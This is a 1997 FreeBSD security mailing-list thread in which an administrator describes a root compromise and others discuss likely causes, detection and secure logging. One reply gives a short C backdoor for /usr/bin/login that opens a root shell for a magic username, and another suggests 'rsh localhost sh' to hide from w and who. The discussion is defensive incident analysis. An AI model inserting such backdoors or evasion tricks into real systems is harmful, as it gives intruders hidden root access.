From owner-freebsd-security Mon Jul 28 03:20:16 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id DAA22155 for security-outgoing; Mon, 28 Jul 1997 03:20:16 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id DAA22146 for ; Mon, 28 Jul 1997 03:20:08 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id DAA03869; Mon, 28 Jul 1997 03:19:55 -0700 (PDT) Date: Mon, 28 Jul 1997 03:19:55 -0700 (PDT) From: Vincent Poy To: security@FreeBSD.ORG cc: "[Mario1-]" , JbHunt Subject: security hole in FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Greetings, We're had a hacker on two of our FreeBSD -current machines who hacked the machine as root. The symptoms are as follows: 1) User on mercury machine complained about perl5 not working which was perl5.003 since libmalloc lib it was linked to was missing. 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 and it works. 3) User hacks earth when he doesn't even have a account on the machine and can login to the machine remotely as root when rlogin and telnet wouldn't allow it. 4) User is invisible in w, finger, who, users and can only be seen using ps -agux on a pty so I killed the process. 5) User changes hostnames even in a netstat output so it's all garbage 6) We went to inetd.conf and shut off all daemons except telnetd and rebooted and user still can get onto the machine invisibly. 7) User shuts down the machine and changes root password Saw the user on irc posting the password of earth with the login name root. Any ideas? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 04:31:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id EAA24268 for security-outgoing; Mon, 28 Jul 1997 04:31:41 -0700 (PDT) Received: from onyks.wszib.poznan.pl (onyks.wszib.poznan.pl [150.254.154.240]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id EAA24260 for ; Mon, 28 Jul 1997 04:31:33 -0700 (PDT) Received: from localhost (loco@localhost) by onyks.wszib.poznan.pl (8.8.6/8.8.5) with SMTP id NAA00437; Mon, 28 Jul 1997 13:30:18 GMT Date: Mon, 28 Jul 1997 13:30:11 +0000 (GMT) From: Tomasz Dudziak To: Vincent Poy cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Mon, 28 Jul 1997, Vincent Poy wrote: > Greetings, > > We're had a hacker on two of our FreeBSD -current machines who > hacked the machine as root. > > The symptoms are as follows: > 1) User on mercury machine complained about perl5 not working which was > perl5.003 since libmalloc lib it was linked to was missing. > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 > and it works. > 3) User hacks earth when he doesn't even have a account on the machine > and can login to the machine remotely as root when rlogin and telnet > wouldn't allow it. > 4) User is invisible in w, finger, who, users and can only be seen using > ps -agux on a pty so I killed the process. > 5) User changes hostnames even in a netstat output so it's all garbage > 6) We went to inetd.conf and shut off all daemons except telnetd and > rebooted and user still can get onto the machine invisibly. > 7) User shuts down the machine and changes root password > > Saw the user on irc posting the password of earth with the login > name root. Any ideas? > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > > Well it is possible that he has recompiled /usr/bin/login for example. Something like: if(strcmp(username, "blahblah")==0) { setuid(0); setgid(0); system("/bin/sh"); } inserted does the job. You are then invisible to w and others... bot not netstat i think... There was a security hole some time ago in perl that allowed local users to gain root access... That's probably the way he got root access... I would check my binaries, sup and recompile. greetings, Tomasz Dudziak -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQB1AwUBM9ye6gQ/iaB0xTA5AQHMewL+NGZQhiQG0Q4ccSbNmAAGaJYQfRDUl9Jn yb0c+6lP2AW6Om3VhSMFbxlpCgm+wPbrhb2FzwvA8Ad9ELErDdWqIsXGLFa46Gw/ ogLqhFgghp+6aAWTwjWYf0J5qWD7iIIn =sbe9 -----END PGP SIGNATURE----- From owner-freebsd-security Mon Jul 28 04:40:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id EAA24497 for security-outgoing; Mon, 28 Jul 1997 04:40:00 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id EAA24492 for ; Mon, 28 Jul 1997 04:39:58 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id EAA04068; Mon, 28 Jul 1997 04:39:28 -0700 (PDT) Date: Mon, 28 Jul 1997 04:39:27 -0700 (PDT) From: Vincent Poy To: Tomasz Dudziak cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Tomasz Dudziak wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =) =)> Greetings, =)> =)> We're had a hacker on two of our FreeBSD -current machines who =)> hacked the machine as root. =)> =)> The symptoms are as follows: =)> 1) User on mercury machine complained about perl5 not working which was =)> perl5.003 since libmalloc lib it was linked to was missing. =)> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 =)> and it works. =)> 3) User hacks earth when he doesn't even have a account on the machine =)> and can login to the machine remotely as root when rlogin and telnet =)> wouldn't allow it. =)> 4) User is invisible in w, finger, who, users and can only be seen using =)> ps -agux on a pty so I killed the process. =)> 5) User changes hostnames even in a netstat output so it's all garbage =)> 6) We went to inetd.conf and shut off all daemons except telnetd and =)> rebooted and user still can get onto the machine invisibly. =)> 7) User shuts down the machine and changes root password =)> =)> Saw the user on irc posting the password of earth with the login =)> name root. Any ideas? =) =)Well it is possible that he has recompiled /usr/bin/login for example. =)Something like: =)if(strcmp(username, "blahblah")==0) =){ =)setuid(0); =)setgid(0); =)system("/bin/sh"); =)} =)inserted does the job. You are then invisible to w and others... bot not =)netstat i think... He wasn't invisible to netstat but he did do something that faked the hostname even in netstat. =)There was a security hole some time ago in perl that allowed local users =)to gain root access... That's probably the way he got root access... =)I would check my binaries, sup and recompile. Hmmm, I supped the perl from the most recent ports tree and also all the binaries are about 2 months old from the -current tree. I thought the security hole was way before that. What I didn't get is how did he get access to the second system (earth) when he doesn't have a account there in the first place? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 05:30:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA00199 for security-outgoing; Mon, 28 Jul 1997 05:30:59 -0700 (PDT) Received: from relaybr.EUnet.fr (relaybr.eunet.fr [193.107.210.133]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA00177 for ; Mon, 28 Jul 1997 05:30:53 -0700 (PDT) Received: from ericf.EUnet-Bretagne.fr ([193.107.210.161] (may be forged)) by relaybr.EUnet.fr (8.8.6/8.6.9) with SMTP id OAA08677; Mon, 28 Jul 1997 14:40:49 +0200 (MET DST) Message-ID: <33DC9377.655C@EUnet-Bretagne.fr> Date: Mon, 28 Jul 1997 14:41:27 +0200 From: Eric Feillant Reply-To: Eric.Feillant@EUnet-Bretagne.fr Organization: EUnet BRETAGNE groupe EUnet X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: Tomasz Dudziak CC: Vincent Poy , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Tomasz Dudziak wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > On Mon, 28 Jul 1997, Vincent Poy wrote: > > > Greetings, > > > > We're had a hacker on two of our FreeBSD -current machines who > > hacked the machine as root. > > > > The symptoms are as follows: > > 1) User on mercury machine complained about perl5 not working which was > > perl5.003 since libmalloc lib it was linked to was missing. > > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 > > and it works. > > 3) User hacks earth when he doesn't even have a account on the machine > > and can login to the machine remotely as root when rlogin and telnet > > wouldn't allow it. > > 4) User is invisible in w, finger, who, users and can only be seen using > > ps -agux on a pty so I killed the process. > > 5) User changes hostnames even in a netstat output so it's all garbage > > 6) We went to inetd.conf and shut off all daemons except telnetd and > > rebooted and user still can get onto the machine invisibly. > > 7) User shuts down the machine and changes root password > > > > Saw the user on irc posting the password of earth with the login > > name root. Any ideas? > > > > > > Cheers, > > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > > > > > > > > Well it is possible that he has recompiled /usr/bin/login for example. > Something like: > if(strcmp(username, "blahblah")==0) > { > setuid(0); > setgid(0); > system("/bin/sh"); > } > inserted does the job. You are then invisible to w and others... bot not > netstat i think... Another way to be invisible is to try something like that: rsh localhost sh A w or who command see nothing. A ps does. > There was a security hole some time ago in perl that allowed local users > to gain root access... That's probably the way he got root access... > I would check my binaries, sup and recompile. > greetings, > Tomasz Dudziak > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3ia > Charset: noconv > > iQB1AwUBM9ye6gQ/iaB0xTA5AQHMewL+NGZQhiQG0Q4ccSbNmAAGaJYQfRDUl9Jn > yb0c+6lP2AW6Om3VhSMFbxlpCgm+wPbrhb2FzwvA8Ad9ELErDdWqIsXGLFa46Gw/ > ogLqhFgghp+6aAWTwjWYf0J5qWD7iIIn > =sbe9 > -----END PGP SIGNATURE----- -- ========= ____ ===== Eric Feillant ======== / / / ___ ___ /_ ====== EUnet BRETAGNE ======= /---- / / / / /___/ / ======= 140, bd de Creach Gwen ====== /____ /___/ / / /___ /_ ======== 29000 QUIMPER, France ===== Bretagne ========= Tel:(+33) 298101620 Fax:(+33) 298101629 Eric.Feillant@EUnet.fr http://www.EUnet.fr Partenaire CISCO, CHECKPOINT (FIREWALL), BAY NETWORKS, UB NETWORK, SUN, CITRIX From owner-freebsd-security Mon Jul 28 05:37:36 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA00659 for security-outgoing; Mon, 28 Jul 1997 05:37:36 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id FAA00650 for ; Mon, 28 Jul 1997 05:37:31 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id IAA03043; Mon, 28 Jul 1997 08:36:53 -0400 (EDT) Date: Mon, 28 Jul 1997 08:36:52 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Tomasz Dudziak wrote: > > =)Well it is possible that he has recompiled /usr/bin/login for example. > =)Something like: > =)if(strcmp(username, "blahblah")==0) > =){ > =)setuid(0); > =)setgid(0); > =)system("/bin/sh"); > =)} > =)inserted does the job. You are then invisible to w and others... bot not > =)netstat i think... > > He wasn't invisible to netstat but he did do something that faked > the hostname even in netstat. In this case, the chances are he just inserted some dud DNS entries, or simply set his in-addr.arpa to something nasty. There's nothing one can do to prevent an authoritative name entry (trash or not) from being accepted in DNS or DNSsec. One thing I would like to see is logging of IP address *and* hostname in the logs. Both are useful, depending on the situation. Due to the nature of TCP, IP addresses are fairly useful in tracing an attack, but often, especially after a time delay, hostnames are the only way to easily contact the maintainer of the IP address. Hostname is also more useful in spotting attacks in the first place, as it's easy for a user to tell when they've logged in from somewhere they haven't :). BTW, does anyone know if there is a secure logging protocol? Syslog on UDP seems a tad unreliable, not to mention opening one up from DoS. I log to a loghost, and that machine could easily suffer DoS from log flooding, etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG would be easy enough to arrange, and far more secure. I assume someone, somewhere has written one, or implemented one, but I haven't been following the Internet Draft releases to closely. > =)There was a security hole some time ago in perl that allowed local users > =)to gain root access... That's probably the way he got root access... > =)I would check my binaries, sup and recompile. > > Hmmm, I supped the perl from the most recent ports tree and also > all the binaries are about 2 months old from the -current tree. I thought > the security hole was way before that. What I didn't get is how did he > get access to the second system (earth) when he doesn't have a account > there in the first place? I'd be tempted to look in all the normal places -- sendmail, etc. What daemons were running on the machine? Any web server processes? Also, I'd heavily suspect that he sniffed a password if no encrypted telnet/ssh is in use.. Any use of NIS going on? Also, .rhosts arrangements can be extremely unhappy if we already know (s)he is messing with DNS entries. Robert Watson From owner-freebsd-security Mon Jul 28 06:12:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA05254 for security-outgoing; Mon, 28 Jul 1997 06:12:49 -0700 (PDT) Received: from burgundy.eecs.harvard.edu (dholland@burgundy.eecs.harvard.edu [140.247.60.165]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA05239 for ; Mon, 28 Jul 1997 06:12:45 -0700 (PDT) Received: (from dholland@localhost) by burgundy.eecs.harvard.edu (8.8.5/8.8.5) id JAA17812; Mon, 28 Jul 1997 09:12:37 -0400 (EDT) From: David Holland Message-Id: <199707281312.JAA17812@burgundy.eecs.harvard.edu> Subject: secure logging (was: Re: security hole in FreeBSD) To: robert@cyrus.watson.org Date: Mon, 28 Jul 1997 09:12:37 -0400 (EDT) Cc: security@freebsd.org In-Reply-To: from "Robert Watson" at Jul 28, 97 08:36:52 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > BTW, does anyone know if there is a secure logging protocol? Syslog on > UDP seems a tad unreliable, not to mention opening one up from DoS. I log > to a loghost, and that machine could easily suffer DoS from log flooding, > etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG > would be easy enough to arrange, and far more secure. I assume someone, > somewhere has written one, or implemented one, but I haven't been > following the Internet Draft releases to closely. I don't know of any; if you run across one or are thinking about designing one, please post or mail... absent any other readily available secure mechanism probably the best bet is to carry log data over ssh. Of course, this doesn't solve the denial of service issue as anyone with a login can spam the local syslog. -- - David A. Holland | VINO project home page: dholland@eecs.harvard.edu | http://www.eecs.harvard.edu/vino From owner-freebsd-security Mon Jul 28 06:43:39 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA06673 for security-outgoing; Mon, 28 Jul 1997 06:43:39 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA06664 for ; Mon, 28 Jul 1997 06:43:32 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id JAA03478; Mon, 28 Jul 1997 09:40:15 -0400 (EDT) From: Adam Shostack Message-Id: <199707281340.JAA03478@homeport.org> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281312.JAA17812@burgundy.eecs.harvard.edu> from David Holland at "Jul 28, 97 09:12:37 am" To: dholland@eecs.harvard.edu (David Holland) Date: Mon, 28 Jul 1997 09:40:14 -0400 (EDT) Cc: robert@cyrus.watson.org, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk | I don't know of any; if you run across one or are thinking about | designing one, please post or mail... absent any other readily | available secure mechanism probably the best bet is to carry log data | over ssh. Of course, this doesn't solve the denial of service issue as | anyone with a login can spam the local syslog. I've been working on a draft set of requirements--very drafty, but since the subject came up, I'll share & ask for feedback. Requirements Reliability: The system must make substantial efforts to not lose information. Network Requirements TCP based Application sequencing with explicit ack before sender deletes Application Reliability NO data discarding Solid message handling locally-messages kept until discard Repeated message management (?) Portability External Alerting External Intrusion Detection linking -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Jul 28 06:55:05 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA07176 for security-outgoing; Mon, 28 Jul 1997 06:55:05 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [194.151.74.97]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA07171 for ; Mon, 28 Jul 1997 06:55:00 -0700 (PDT) Received: (from guido@localhost) by gvr.win.tue.nl (8.8.6/8.8.2) id PAA04645; Mon, 28 Jul 1997 15:53:11 +0200 (MET DST) From: Guido van Rooij Message-Id: <199707281353.PAA04645@gvr.win.tue.nl> Subject: Re: security hole in FreeBSD In-Reply-To: from Robert Watson at "Jul 28, 97 08:36:52 am" To: robert@cyrus.watson.org Date: Mon, 28 Jul 1997 15:53:11 +0200 (MET DST) Cc: vince@mail.MCESTATE.COM, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > BTW, does anyone know if there is a secure logging protocol? Syslog on > UDP seems a tad unreliable, not to mention opening one up from DoS. I log Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped with an option -s that makes it refuse syslog messages form remote machins. This of course does not help if you want to be able to get syslog entries from a remote host. But you can refure udp packet with destination port 513 on your routers. -Guido From owner-freebsd-security Mon Jul 28 07:05:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA07938 for security-outgoing; Mon, 28 Jul 1997 07:05:04 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA07921 for ; Mon, 28 Jul 1997 07:04:53 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.5/8.8.5) id KAA28556; Mon, 28 Jul 1997 10:04:50 -0400 (EDT) Date: Mon, 28 Jul 1997 10:04:50 -0400 (EDT) From: Garrett Wollman Message-Id: <199707281404.KAA28556@khavrinen.lcs.mit.edu> To: David Holland Cc: security@FreeBSD.ORG Subject: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281312.JAA17812@burgundy.eecs.harvard.edu> References: <199707281312.JAA17812@burgundy.eecs.harvard.edu> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < said: > I don't know of any; if you run across one or are thinking about > designing one, please post or mail... absent any other readily > available secure mechanism probably the best bet is to carry log data > over ssh. Of course, this doesn't solve the denial of service issue as > anyone with a login can spam the local syslog. It would be pretty trivial to add Kerberos authentication to syslogd (using krb_mk_safe/krb_rd_safe).... Of course, that doesn't help most users, but perhaps it can serve as an incentive. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Mon Jul 28 07:56:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA10815 for security-outgoing; Mon, 28 Jul 1997 07:56:48 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA10808 for ; Mon, 28 Jul 1997 07:56:46 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA03275; Mon, 28 Jul 1997 10:56:30 -0400 (EDT) Date: Mon, 28 Jul 1997 10:56:29 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: security@FreeBSD.ORG Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281340.JAA03478@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Adam Shostack wrote: > | I don't know of any; if you run across one or are thinking about > | designing one, please post or mail... absent any other readily > | available secure mechanism probably the best bet is to carry log data > | over ssh. Of course, this doesn't solve the denial of service issue as > | anyone with a login can spam the local syslog. > > I've been working on a draft set of requirements--very drafty, but > since the subject came up, I'll share & ask for feedback. > > > Requirements > > Reliability: The system must make substantial efforts to not > lose information. > > Network Requirements > TCP based > Application sequencing with explicit ack before sender deletes > Application Reliability > NO data discarding > Solid message handling locally-messages kept until discard > Repeated message management (?) > > Portability > External Alerting > External Intrusion Detection linking My initial thought on the matter was a simple MD5 hash/signature on it based on a shared secret. Also, as I thought a bit on it, I became concerned with reliable delivery, sequencing, replay protection, etc. TCP indeed becomes the transport of choice for secured syslog messages, as well as some simple authenticity function. Is MD5 too heavy-weight to use in this environment? Olafur Gudmundsson (TIS) and myself (also TIS) have recently been working with the Transaction Signature draft for DNS (TSIG), and maybe some similar function could be applied. In the new TSIG draft (due out relatively soon), there is a description of a TCP-based signature system where signatures are made over the concatenation of previous seignature, new data, and timing information. This doesn't allow for your specific ACK, which I agree is needed. TSIG provides signatures over the body of a transaction, and in the case of TCP aborts the transaction, which may not be appropriate. As a loghost, I wish to be able to verify the following: 1. Network log data comes from an entity I wish to accept log data for (probably determined using a DNS FQDN of some type, possibly a hostname, possibly some other entity name.) 2. Network data has not been modified, inserted, lost, or spoofed in any nasty way. Retransmission should be requested if data is modified. This prevents logs from being flooded with spoofed or false data by hosts or entities that are inappropriate, and provides reliable transmission. This doesn't address log management, which is an on-host issue. Changing current syslog behavior is desirable here: authenticated log entries should be stored with some indication of how they were authenticated, and what identity against. Changing the behavior of syslog concerning accepting arbitrary log messages from arbitrary entities on a host would also be nice. All log entries submitted by logger (etc) should be associated with a user ID; types and levels of log entries submitted should be restricted/able. Hopefully, the authentication system will allow forwarding of log messages to a log host indirectly. How this is managed may vary on the needs. Should the behavior be: Forward all messages, let the log host sort out which to keep or Forward only authenticated messages from a host The first means only the server has to be configured in order to restrict host entries, the seconds requires that intermediate servers also do authentication checking. On the other hand, a flood of bogus log messages would take out the forwarder, but not the server in the forwarder verification case? Some thought may be required here. Just some thoughts -- I haven't really given the issue much thought other than the decision to ask if anyone else had worked on it :). Secure logging is clearly desirable, though. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 08:00:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA10996 for security-outgoing; Mon, 28 Jul 1997 08:00:31 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA10990 for ; Mon, 28 Jul 1997 08:00:28 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA03282; Mon, 28 Jul 1997 10:59:45 -0400 (EDT) Date: Mon, 28 Jul 1997 10:59:44 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Guido van Rooij cc: vince@mail.MCESTATE.COM, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707281353.PAA04645@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Guido van Rooij wrote: > > > > BTW, does anyone know if there is a secure logging protocol? Syslog on > > UDP seems a tad unreliable, not to mention opening one up from DoS. I log > > Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped > with an option -s that makes it refuse syslog messages form remote > machins. This of course does not help if you want to be able to get > syslog entries from a remote host. But you can refure udp packet > with destination port 513 on your routers. Unfortunately, I don't have the liberty of reconfiguring some of the routers my hosts are acessible through. Using ipfirewall to restrict incoming messages is possible, but undesirable as it doesn't help against spoofing, if the threat is also inside your network. The vulnerable host in the -s case is the loghost, which must accept network log messages. Configuring with a default of -s is a good arrangement. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 08:45:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA13429 for security-outgoing; Mon, 28 Jul 1997 08:45:20 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA13410 for ; Mon, 28 Jul 1997 08:45:14 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.8.4/8.8.4) with ESMTP id RAA01141 for ; Mon, 28 Jul 1997 17:45:11 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.8.6/brasil-1.2) with UUCP id RAA04796 for security@FreeBSD.ORG; Mon, 28 Jul 1997 17:44:52 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.6/keltia-uucp-2.9) id RAA05405; Mon, 28 Jul 1997 17:16:34 +0200 (CEST) Message-ID: <19970728171633.10794@keltia.freenix.fr> Date: Mon, 28 Jul 1997 17:16:33 +0200 From: Ollivier Robert To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.76 In-Reply-To: ; from Vincent Poy on Mon, Jul 28, 1997 at 03:19:55AM -0700 X-Operating-System: FreeBSD 3.0-CURRENT ctm#3481 AMD-K6 MMX @ 208 MHz Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk According to Vincent Poy: > 1) User on mercury machine complained about perl5 not working which was > perl5.003 since libmalloc lib it was linked to was missing. > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 > and it works. I don't think he used perl to hack root unless you kept old versions of Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by Werner. 5.003+ holes are fixed in 5.004 and later. > 6) We went to inetd.conf and shut off all daemons except telnetd and > rebooted and user still can get onto the machine invisibly. That shows that he has used a spare port to hook a root shell on. In these case, "netstat -a" or "lsof -i:TCP" will give you all connections, including those on which a program is LISTENing to. That way you'll catch any process left on a port. -- Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997 From owner-freebsd-security Mon Jul 28 08:49:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA13673 for security-outgoing; Mon, 28 Jul 1997 08:49:03 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA13664 for ; Mon, 28 Jul 1997 08:49:00 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id LAA03402; Mon, 28 Jul 1997 11:48:46 -0400 (EDT) Date: Mon, 28 Jul 1997 11:48:46 -0400 (EDT) From: Robert 